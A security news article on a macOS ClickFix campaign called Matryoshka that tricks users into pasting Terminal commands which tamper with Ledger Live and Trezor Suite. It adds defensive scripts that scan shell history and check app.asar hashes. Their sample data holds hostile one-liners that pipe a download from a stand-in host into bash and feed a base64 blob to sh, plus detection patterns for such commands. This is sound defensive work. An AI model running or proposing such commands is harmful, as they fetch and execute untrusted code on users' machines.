Mac users are being targeted by a sophisticated new social engineering campaign that wraps malicious code in layers of deceit, much like the famous Russian nesting dolls it’s named after. Intego Antivirus Labs has uncovered “Matryoshka,” a new variant of the “ClickFix” scam that tricks users into infecting their own machines under the guise of fixing a technical problem.
The campaign specifically targets cryptocurrency users, attempting to surgically alter trusted wallet applications to steal funds.
The attack begins with a simple mistake: a typo. Attackers have registered domains that look nearly identical to legitimate software review sites. For example, a user trying to visit comparisons.org might accidentally type comparisions.org.
That one extra letter is enough. “The site immediately forwards the visitor through a Traffic Distribution System (TDS),” the report explains; a TDS is the redirector layer that selects which visitors are routed onward to the lure page rather than to harmless content.
Instead of the site they expected, the user is presented with a fake error message and a helpful “fix.” “The user is presented with instructions to copy a ‘fix’ command and paste it into the macOS Terminal,” Intego researchers note.
What sets Matryoshka apart is how hard it tries to hide. Unlike a plain shell script, this malware uses “nested obfuscation layers” to evade detection by security software.
The payload includes an “in-memory, compressed wrapper and API-gated network communications designed to hinder static analysis and automated sandboxes”. In practice, the stages that matter are only decompressed and decoded in memory, so a file-based scanner sees the outer wrapper rather than the real payload, and the network stage only hands over the next layer to a request that satisfies the attackers' API checks, which starves an automated sandbox of anything worth analysing.
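The only step the victim performs by hand is pasting the “fix” into Terminal, which leaves a trace in the shell history. The following is an added triage check, not code from Intego's report: it scans a zsh or bash history file for ClickFix-style one-liners. The patterns describe the generic shape of such commands (a download piped straight into an interpreter, a base64-decode chain feeding a shell, a backgrounded launch), which is an assumption about command shape and not Matryoshka's actual command; the history lines are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from Intego's report): flag ClickFix-style
# "paste this into Terminal" one-liners in a shell history file.
# The regexes below are generic ClickFix tradecraft, not the real
# Matryoshka command (which this example does not know).

# Strip zsh extended-history prefixes (": 1700000000:0;cmd") and print
# every remaining command line that matches one of the patterns.
clickfix_hits() {
    sed -E 's/^: [0-9]+:[0-9]+;//' "$1" | grep -i -E \
        -e '(curl|wget)[^|]*\|[[:space:]]*(sh|bash|zsh|python[0-9.]*|osascript)([[:space:]]|$)' \
        -e 'base64[[:space:]]+(-d|--decode|-D).*\|[[:space:]]*(sh|bash|zsh|python[0-9.]*|osascript)([[:space:]]|$)' \
        -e 'echo[[:space:]]+"?[A-Za-z0-9+/=]{40,}"?[[:space:]]*\|' \
        -e 'nohup[[:space:]].*(curl|wget|osascript)' \
        -e '(sh|bash|zsh)[[:space:]]+-c[[:space:]]+.*\$\((curl|wget)' \
        || true
}

# Number of flagged lines in a history file (prints 0 when clean, exits 0).
clickfix_hit_count() {
    clickfix_hits "$1" | grep -c . || true
}

# Constructed sample history: two benign commands, two ClickFix-style lines.
# The domain is a fake .invalid name, not the typosquat from the report.
write_sample_history() {
    cat > "$1" <<'EOF'
: 1700000000:0;ls -la ~/Downloads
: 1700000010:0;curl -fsSL https://comparisions.invalid/fix.sh | bash
: 1700000020:0;echo "aGVsbG8gd29ybGQgdGhpcyBpcyBhIGxvbmcgYmFzZTY0IGJsb2I=" | base64 -d | sh
: 1700000030:0;git status
EOF
}

# Demo: write the sample history and print the flagged lines.
tmp=$(mktemp)
write_sample_history "$tmp"
clickfix_hits "$tmp"
rm -f "$tmp"
```

On a real Mac, point `clickfix_hits` at `~/.zsh_history` (or `~/.bash_history`) for each user; a hit is a reason to look at the Terminal's recent process tree and outbound connections, not proof of infection, since legitimate installers also use `curl | bash`.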
Once the victim pastes the command, the malware goes to work. It doesn't just steal files; it modifies them. The attack targets the desktop companion apps for hardware wallets, Ledger Live and Trezor Suite.
- Trezor Suite: The malware takes a wholesale approach. “If Trezor Suite is found, the script attempts to terminate the process, remove the application, and download a malicious replacement”.
- Ledger Live: The tactic here is more subtle. “The payload attempts to replace an Electron archive (app.asar) and related metadata within the legitimate application bundle,” essentially surgically patching the app to include a backdoor while keeping the rest of the software intact.
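Both tamperings leave something a defender can measure: a swapped app.asar changes the file's hash and breaks the bundle's code-signing seal, and a wholesale replacement is a different bundle altogether. The check below is an added example, not Intego's or Ledger's code. It records a SHA-256 baseline of app.asar from a known-clean install and later compares it, and on macOS additionally runs codesign's seal verification. The `Contents/Resources/app.asar` path is the standard Electron layout; the bundle paths and the baseline file location are assumptions, and the demo uses a constructed bundle so it runs on any host.

```shell
#!/bin/sh
# Added example (not Intego's or Ledger's code): detect a swapped app.asar
# in an Electron wallet bundle by comparing against a recorded baseline,
# plus the macOS code-signing seal where codesign(1) exists.
# Paths below are assumptions for the example.

# Portable SHA-256 of one file (coreutils sha256sum or macOS shasum).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Record the hash of <bundle>/Contents/Resources/app.asar into <baseline>.
# Run this once against a freshly installed copy you trust.
record_asar_baseline() {
    sha256_of "$1/Contents/Resources/app.asar" > "$2"
}

# Compare the current app.asar with <baseline>; returns 0 only if unchanged.
check_asar_baseline() {
    asar="$1/Contents/Resources/app.asar"
    [ -f "$asar" ] || { echo "ALERT missing $asar"; return 1; }
    expected=$(cat "$2")
    actual=$(sha256_of "$asar")
    if [ "$actual" = "$expected" ]; then
        echo "OK  app.asar unchanged ($actual)"
        return 0
    fi
    echo "ALERT app.asar hash changed: expected $expected, got $actual"
    return 1
}

# On macOS, verify the bundle's signature seal; a modified Resources/app.asar
# fails this. Elsewhere, report that the check was skipped.
check_codesign() {
    if command -v codesign >/dev/null 2>&1; then
        codesign --verify --deep --strict "$1" && echo "OK  codesign seal intact: $1"
    else
        echo "SKIP codesign not available on this host"
        return 0
    fi
}

# Demo on a constructed bundle (not a real wallet app): record a baseline,
# then swap app.asar and watch the check fail.
demo_tampered_bundle() {
    d=$(mktemp -d)
    mkdir -p "$d/Wallet.app/Contents/Resources"
    printf 'clean app.asar contents' > "$d/Wallet.app/Contents/Resources/app.asar"
    record_asar_baseline "$d/Wallet.app" "$d/baseline.sha256"
    check_asar_baseline "$d/Wallet.app" "$d/baseline.sha256"
    printf 'backdoored app.asar contents' > "$d/Wallet.app/Contents/Resources/app.asar"
    check_asar_baseline "$d/Wallet.app" "$d/baseline.sha256" || echo "(tamper detected, as expected)"
    rm -rf "$d"
    return 0
}
demo_tampered_bundle
```

For a real install you would run `record_asar_baseline "/Applications/Ledger Live.app" ~/ledger-live.sha256` right after installing from the vendor, then `check_asar_baseline` and `check_codesign` on the same path during triage. The hash check alone does not cover the Trezor Suite case, where the whole bundle is replaced and the replacement may carry a perfectly valid signature from a different signer; there, compare the `TeamIdentifier=` line from `codesign -dv --verbose=4` against the value you recorded from the clean install as well.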
After harvesting browser data and compromising wallets, it displays a fake error message: “Your Mac does not support this application. Try reinstalling or downloading the version for your system”.
This message is designed to “reduce suspicion and can delay investigation,” leaving the victim confused but unaware that their digital assets are already being siphoned off.